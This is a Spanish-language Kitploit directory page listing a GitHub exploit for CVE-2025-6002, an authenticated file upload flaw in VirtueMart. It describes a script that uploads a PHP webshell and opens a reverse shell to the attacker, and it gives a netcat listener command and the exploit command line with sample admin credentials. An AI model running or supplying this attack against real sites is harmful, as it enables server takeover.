Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-6002 | Kitploit
Herramientas/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de Penetración
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit para CVE-2025-6002

Este script explota la vulnerabilidad autenticada de carga arbitraria de archivos en VirtueMart < 4.4.10 (CVE-2025-6002), que se describe en esta publicación del blog: https://blog.blacklanternsecurity.com/p/doomla-zero-days

Este script inicia sesión en VirtueMart con las credenciales proporcionadas, crea un nuevo producto y sube un webshell PHP como archivo multimedia. Luego invoca una reverse shell a la IP/puerto proporcionados.

Parámetros:

  • --url: La url de VirtueMart
  • --username: nombre de usuario del administrador
  • --password: contraseña del administrador
  • --remote-ip: dirección IP del atacantehttps://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: puerto del atacante

Uso:

  1. Ejecuta Netcat en la máquina del atacante:
root@kitploit:~
nc -nlvp 1337
  1. Ejecuta el exploit
root@kitploit:~
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
Descargar herramienta